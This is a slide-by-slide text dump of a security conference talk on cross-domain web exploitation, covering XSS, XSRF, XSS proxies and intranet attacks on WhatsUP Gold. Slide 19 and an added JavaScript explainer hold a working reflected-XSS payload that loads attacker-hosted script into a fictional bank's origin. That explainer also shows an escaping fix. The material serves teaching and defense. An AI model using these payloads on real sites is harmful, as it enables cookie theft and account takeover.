
Kicking Down the Cross Domain Door Techniques for Cross Domain - PowerPoint PPT Presentation



  1. Kicking Down the Cross Domain Door: Techniques for Cross Domain Exploitation. Billy K Rios (BK) and Raghav Dube

  2. Tabbed Browsing • Rich Content • Mash-ups • Cookies • JSON • Ajax • Implication of Cross Domain Attacks

  3. Implication of Cross Domain Attacks

  4. Attack Foundations: Cross Site Scripting (XSS) • Injected Client Code • Cookie Stealing • Browser Hijacking • Web Page Defacement • Hawtness

  5. XSS Example / Demo Attack Foundations

  6. Attack Foundations: Cross Site Request Forgery (XSRF) • Applications Trust • Parameters, Cookie, IP Space… • Authenticated Examples • New Hawtness

  7. XSRF Example / Demo Attack Foundations

  8. Attack Foundations XSS meets XSRF • Using XSS and XSRF together! • XSSXSSRFSSX? • Both Have Strengths • Both Have Weaknesses • One Armed Boxers

  9. XSS Proxies and Frameworks: XSS Proxy Fundamentals • Anton Rager – XSS Proxy • BeEf, XSS Shell, Backframe • <script>alert('xss')</script> • <script src=…/proxy.js> • Dynamic JavaScript Payloads • Frames and Control Channels

  10. XSS Proxies and Frameworks XS-Sniper • Typical XSS Proxy • Rendering of HTML • Organization of Data • JavaScript Payloads Provided • Source Code Snippets

  11. XSS Proxies and Frameworks: Dynamic JavaScript Payload for execute.js; captured incoming HTTP requests to the XS-Sniper Proxy

  12. Dynamic JavaScript Payload for external.js

  13. XSS Proxies and Frameworks

  14. The Attack – The Initial XSS: MyPercent20.com • Popular Social Networking/Blogging Site • User Base of Tens of Thousands of Users • Allows Uploading of HTML and Other Content

  15. The Attack – BigCreditUnion.com BigCreditUnion.com • Typical Online Banking Website • Fictional Credit Union • Built-in Vulnerabilities for Demo

  16. The Attack – BigCreditUnion.com (diagram: Attacker, MyPercent20, Internet, BigCreditUnion, The Victim)

  17. The Attack – BigCreditUnion.com Assumptions • The victim has access to the Internet • BigCreditUnion.com has an XSS exposure • The victim is using IE or Firefox

  18. The Attack – BigCreditUnion.com Steps to Exploitation • Target Reconnaissance • Initial XSS • Jumping to BigCreditUnion • Authenticated Attacks • Unauthenticated Attacks

  19. Jumping to BigCreditUnion: the code injected into MyPercent20 points a frame at the bank's login page, carrying a reflected XSS payload in acctnum that loads the attacker's script. The jump line and the two attacker-side URLs from the slide:
      parent.myFrame3.location.href='http://www.bigcreditunion.com/login.asp?acctnum="></td><script%20src=http://www.attacker.com/test/external-spot.js?></script><td>';
      http://www.attacker.com/test/external-spot.js?test123
      http://www.attacker.com/test/noresponse.js?test123
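Why the slide 19 line works, as an added example written for this page (it is neither the talk's code nor anything from BigCreditUnion.com, which is fictional): the bank's login page is assumed to reflect the acctnum query parameter into an input's value attribute inside a table cell without encoding it, which is why the payload starts by closing the attribute and the cell. The vulnerable template, its hardened variant, the jump-URL builder and the check are all constructed here.

```javascript
'use strict';

// Added illustration for slide 19; not the talk's code, and BigCreditUnion.com is fictional.
// Assumption: the login page reflects the acctnum query parameter into an <input> inside
// a table cell without encoding it. The template below is a constructed stand-in.
function renderLoginVulnerable(acctnum) {
  return '<table><tr><td><input name="acctnum" value="' + acctnum + '"></td></tr></table>';
}

// Hardened rendering: HTML-encode the five significant characters before reflecting.
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g,
    (c) => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}
function renderLoginHardened(acctnum) {
  return '<table><tr><td><input name="acctnum" value="' + htmlEscape(acctnum) + '"></td></tr></table>';
}

// Attacker side of the jump. From JavaScript already running on the social site, aim a
// frame at the bank's login page with an acctnum value that (1) closes the value attribute
// and the <td>, (2) injects <script src> pointing at the attacker, (3) reopens a <td> so the
// rest of the page still parses. %20 is the slide's spelling of the space in the script tag.
function buildJumpUrl(loginUrl, scriptUrl) {
  const payload = '"></td><script%20src=' + scriptUrl + '></script><td>';
  return loginUrl + '?acctnum=' + payload;
}

// What the victim's browser parses after the bank reflects the parameter. Parsing the URL
// the way a server would (percent-decoding the query) turns %20 back into a space.
function reflectedPage(jumpUrl, render) {
  return render(new URL(jumpUrl).searchParams.get('acctnum'));
}

// Did the reflection produce a live script tag?
function injectsScript(html) {
  return /<script\s+src=/i.test(html);
}

// In the browser the injected MyPercent20 code is just the slide's one line:
//   parent.myFrame3.location.href = buildJumpUrl('http://www.bigcreditunion.com/login.asp',
//                                                'http://www.attacker.com/test/external-spot.js?');
```

Once the frame has loaded, external-spot.js executes as www.bigcreditunion.com and can read that origin's DOM and cookies, which is the whole point of the jump: the XSS on the social site only supplied a place to run code, the reflected XSS on the bank supplied the origin. On the defending side, renderLoginHardened shows the minimum change for this vector, encoding for the HTML attribute context before reflecting; a filter that only strips the literal string "<script " would not have helped here.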

  20. The Attack – BigCreditUnion.com DEMO

  21. The Attack – WhatsUP Gold 2006 • Made by Ipswitch • Has Known XSS Vulnerabilities • Found on Corporate Intranets • Not Limited to WhatsUP Gold • “Protected by Firewalls!”

  22. The Attack – WhatsUP Gold 2006

  23. The Attack – WhatsUP Gold 2006

  24. The Attack – WhatsUP Gold 2006 (diagram: Attacker, MyPercent20, Internet, The Victim, WhatsUP Gold)

  25. The Attack – WhatsUP Gold 2006 Assumptions • The management console is only available via the Intranet • The victim will NOT be logged into the management console • The victim does NOT have a WhatsUP account • The victim is using Firefox (Possible with IE) • No unauthenticated XSS vulnerabilities

  26. The Attack – WhatsUP Gold 2006 Steps to Exploitation • Vulnerability Research • Target Reconnaissance • Initial XSS • Port scanning and Fingerprinting • Brute Forcing Credentials • XSS follow-up • Driving Interaction

  27. The Attack – WhatsUP Gold 2006 Creds List

  28. The Attack – WhatsUP Gold 2006: NOT LIMITED TO WhatsUP Gold!

  29. The Attack – WhatsUP Gold 2006 DEMO

  30. One More Time… This time in Slow motion WTF?

  31. Questions and Thanks… PEOPLE I've MET / PEOPLE I haven't MET: Danya, Nitesh Dhanjani, Jeremiah Grossman, Rajat Swarup, RSnake, Sriram, Anton Rager, Mike Crabtree, SPI Dynamics, Old PAC-CERT Crew, Black Hat, Ed Souza, Houston & New York Advanced Security Centers!
